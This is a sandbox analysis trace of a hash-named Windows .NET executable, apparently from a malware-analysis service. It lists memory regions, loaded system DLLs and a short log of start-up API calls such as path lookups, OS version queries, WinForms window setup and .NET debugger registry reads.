end_va = 0x73c4afff
monitored = 0
entry_point = 0x73c39050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1633
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 1634
start_va = 0x4e20000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1635
start_va = 0x4e20000
end_va = 0x4e23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1636
start_va = 0x4f20000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f20000"
filename = ""
Region:
id = 1637
start_va = 0x4e30000
end_va = 0x4e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 1638
start_va = 0x4e40000
end_va = 0x4e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e40000"
filename = ""
Region:
id = 1639
start_va = 0x4e50000
end_va = 0x4e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e50000"
filename = ""
Region:
id = 1640
start_va = 0x4e30000
end_va = 0x4e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 1641
start_va = 0x4e40000
end_va = 0x4e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e40000"
filename = ""
Region:
id = 1642
start_va = 0x6ab80000
end_va = 0x6ab85fff
monitored = 0
entry_point = 0x6ab81570
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll")
Region:
id = 1643
start_va = 0x6ab70000
end_va = 0x6ab77fff
monitored = 1
entry_point = 0x6ab73809
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll")
Region:
id = 1644
start_va = 0x4e30000
end_va = 0x4e30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004e30000"
filename = ""
Region:
id = 1645
start_va = 0x4e30000
end_va = 0x4e83fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll")
Region:
id = 1646
start_va = 0x4e90000
end_va = 0x4e9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 1647
start_va = 0x4e90000
end_va = 0x4e94fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 1648
start_va = 0x4ea0000
end_va = 0x4ee0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 1649
start_va = 0x4ef0000
end_va = 0x4ef4fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004ef0000"
filename = ""
Region:
id = 1650
start_va = 0x4f00000
end_va = 0x4f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 1651
start_va = 0x6aaf0000
end_va = 0x6ab7cfff
monitored = 1
entry_point = 0x6ab19060
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll")
Region:
id = 1652
start_va = 0x4f10000
end_va = 0x4f10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004f10000"
filename = ""
Region:
id = 1653
start_va = 0x4f30000
end_va = 0x4f33fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f30000"
filename = ""
Region:
id = 1654
start_va = 0x4f40000
end_va = 0x4f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f40000"
filename = ""
Region:
id = 1655
start_va = 0x4f80000
end_va = 0x507ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f80000"
filename = ""
Region:
id = 1656
start_va = 0x5090000
end_va = 0x50cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 1657
start_va = 0x50d0000
end_va = 0x51cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050d0000"
filename = ""
Region:
id = 1658
start_va = 0x51d0000
end_va = 0x51e8fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000051d0000"
filename = ""
Region:
id = 1659
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1660
start_va = 0x51f0000
end_va = 0x52effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051f0000"
filename = ""
Region:
id = 1661
start_va = 0x52f0000
end_va = 0x52fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000052f0000"
filename = ""
Region:
id = 1806
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1807
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1808
start_va = 0x52f0000
end_va = 0x532ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000052f0000"
filename = ""
Region:
id = 1809
start_va = 0x5330000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005330000"
filename = ""
Region:
id = 1810
start_va = 0x5430000
end_va = 0x546ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005430000"
filename = ""
Region:
id = 1811
start_va = 0x5470000
end_va = 0x556ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005470000"
filename = ""
Region:
id = 1812
start_va = 0x74a30000
end_va = 0x74a35fff
monitored = 0
entry_point = 0x74a31460
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1813
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1814
start_va = 0x5570000
end_va = 0x55affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005570000"
filename = ""
Region:
id = 1815
start_va = 0x55b0000
end_va = 0x56affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000055b0000"
filename = ""
Region:
id = 1816
start_va = 0x56b0000
end_va = 0x57affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000056b0000"
filename = ""
Region:
id = 1817
start_va = 0x57b0000
end_va = 0x57effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057b0000"
filename = ""
Region:
id = 1818
start_va = 0x57f0000
end_va = 0x58effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057f0000"
filename = ""
Region:
id = 1819
start_va = 0x5080000
end_va = 0x5082fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005080000"
filename = ""
Region:
id = 1820
start_va = 0x75e90000
end_va = 0x75eeefff
monitored = 0
entry_point = 0x75e94af0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 1821
start_va = 0x71a70000
end_va = 0x71abefff
monitored = 0
entry_point = 0x71a7d850
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1822
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 1823
start_va = 0x58f0000
end_va = 0x595bfff
monitored = 0
entry_point = 0x594cd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 1824
start_va = 0x5960000
end_va = 0x596ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005960000"
filename = ""
Region:
id = 1825
start_va = 0x5970000
end_va = 0x5a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005970000"
filename = ""
Region:
id = 1826
start_va = 0x5a70000
end_va = 0x5a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a70000"
filename = ""
Region:
id = 1827
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 1828
start_va = 0x5a80000
end_va = 0x5a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a80000"
filename = ""
Region:
id = 1829
start_va = 0x637a0000
end_va = 0x63999fff
monitored = 0
entry_point = 0x639782be
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.XML.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.xml\\2.0.0.0__b77a5c561934e089\\system.xml.dll")
Region:
id = 1830
start_va = 0x5a90000
end_va = 0x5c89fff
monitored = 0
entry_point = 0x5c682be
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.XML.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.xml\\2.0.0.0__b77a5c561934e089\\system.xml.dll")
Region:
id = 1831
start_va = 0x5c90000
end_va = 0x5caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005c90000"
filename = ""
Region:
id = 1832
start_va = 0x637a0000
end_va = 0x63999fff
monitored = 0
entry_point = 0x639782be
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.XML.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.xml\\2.0.0.0__b77a5c561934e089\\system.xml.dll")
Region:
id = 1833
start_va = 0x5cb0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cb0000"
filename = ""
Region:
id = 1834
start_va = 0x5cb0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cb0000"
filename = ""
Region:
id = 1835
start_va = 0x5cc0000
end_va = 0x5ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cc0000"
filename = ""
Region:
id = 1836
start_va = 0x5cd0000
end_va = 0x5cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cd0000"
filename = ""
Region:
id = 1837
start_va = 0x5ce0000
end_va = 0x5ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ce0000"
filename = ""
Region:
id = 1838
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1839
start_va = 0x5d10000
end_va = 0x5d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d10000"
filename = ""
Region:
id = 1840
start_va = 0x5cb0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cb0000"
filename = ""
Region:
id = 1841
start_va = 0x5cc0000
end_va = 0x5ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cc0000"
filename = ""
Region:
id = 1842
start_va = 0x5cd0000
end_va = 0x5cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cd0000"
filename = ""
Region:
id = 1843
start_va = 0x5cd0000
end_va = 0x5ceffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005cd0000"
filename = ""
Region:
id = 1844
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1845
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1846
start_va = 0x719a0000
end_va = 0x71a23fff
monitored = 0
entry_point = 0x719c6530
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 1847
start_va = 0x74610000
end_va = 0x74616fff
monitored = 0
entry_point = 0x74611e10
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 1848
start_va = 0x71970000
end_va = 0x7199efff
monitored = 0
entry_point = 0x7197bb70
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 1849
start_va = 0x5d20000
end_va = 0x5d5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d20000"
filename = ""
Region:
id = 1850
start_va = 0x5d60000
end_va = 0x5e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d60000"
filename = ""
Region:
id = 1851
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1852
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1853
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1854
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1855
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1856
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1857
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1858
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1859
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1860
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1861
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1862
start_va = 0x5d00000
end_va = 0x5d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 1863
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1864
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1865
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1866
start_va = 0x5d00000
end_va = 0x5d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 1867
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1868
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1869
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1870
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1871
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1872
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1873
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1874
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1875
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1876
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1877
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1878
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1879
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1880
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1881
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1882
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1883
start_va = 0x5d00000
end_va = 0x5d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 1884
start_va = 0x5cf0000
end_va = 0x5cf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005cf0000"
filename = ""
Region:
id = 1885
start_va = 0x5e60000
end_va = 0x5edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e60000"
filename = ""
Region:
id = 1886
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1887
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1889
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Thread:
id = 105
os_tid = 0xce0
[0197.765] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0197.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0197.933] GetLastError () returned 0x2
[0197.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0197.941] GetLastError () returned 0x2
[0197.945] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0197.945] GetLastError () returned 0x2
[0197.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0197.952] GetLastError () returned 0x2
[0197.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0197.952] GetLastError () returned 0x2
[0197.960] GetVersionExW (in: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0197.960] GetLastError () returned 0x2
[0197.961] GetVersionExW (in: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0197.961] GetLastError () returned 0x2
[0199.021] _finite (_X=0x0) returned 1
[0199.349] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1ae
[0199.349] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1af
[0199.638] GetSystemMetrics (nIndex=75) returned 1
[0199.943] AdjustWindowRectEx (in: lpRect=0x19ee9c, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19ee9c) returned 1
[0199.978] GetCurrentProcess () returned 0xffffffff
[0199.979] GetCurrentThread () returned 0xfffffffe
[0199.979] GetCurrentProcess () returned 0xffffffff
[0199.983] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19edcc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19edcc*=0x270) returned 1
[0199.983] GetLastError () returned 0x2
[0200.029] GetCurrentThreadId () returned 0xce0
[0200.219] lstrlenW (lpString="䅁") returned 1
[0200.309] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76300000
[0200.312] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcW") returned 0x772eaee0
[0200.317] GetStockObject (i=5) returned 0x1900015
[0200.317] GetLastError () returned 0x2
[0200.350] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.352] CoTaskMemAlloc (cb=0x4c) returned 0x5f2570
[0200.352] RegisterClassW (lpWndClass=0x673948) returned 0xc1de
[0200.353] GetLastError () returned 0x2
[0200.353] CoTaskMemFree (pv=0x5f2570)
[0200.353] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.372] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x9027e
[0200.383] SetWindowLongW (hWnd=0x9027e, nIndex=-4, dwNewLong=1999548128) returned 33687698
[0200.402] GetWindowLongW (hWnd=0x9027e, nIndex=-4) returned 1999548128
[0200.411] lstrlenW (lpString="䅁") returned 1
[0200.413] GetVersionExW (in: lpVersionInformation=0x673968*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673968*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0200.413] GetLastError () returned 0x2
[0200.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e41c | out: phkResult=0x19e41c*=0x274) returned 0x0
[0200.419] RegQueryValueExW (in: hKey=0x274, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0200.419] RegQueryValueExW (in: hKey=0x274, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0200.420] RegCloseKey (hKey=0x274) returned 0x0
[0200.446] SetWindowLongW (hWnd=0x9027e, nIndex=-4, dwNewLong=33688018) returned 1999548128
[0200.446] GetWindowLongW (hWnd=0x9027e, nIndex=-4) returned 33688018
[0200.446] GetWindowLongW (hWnd=0x9027e, nIndex=-16) returned 113311744
[0200.582] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1dd
[0200.595] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x24, wParam=0x0, lParam=0x19e734) returned 0x0
[0200.597] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1d9
[0200.598] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x81, wParam=0x0, lParam=0x19e728) returned 0x1
[0200.599] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x83, wParam=0x0, lParam=0x19e714) returned 0x0
[0200.607] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x1, wParam=0x0, lParam=0x19e728) returned 0x0
[0200.614] GetClientRect (in: hWnd=0x9027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0200.617] GetWindowRect (in: hWnd=0x9027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0200.752] GetLastError () returned 0x6
[0200.757] GetParent (hWnd=0x9027e) returned 0x0
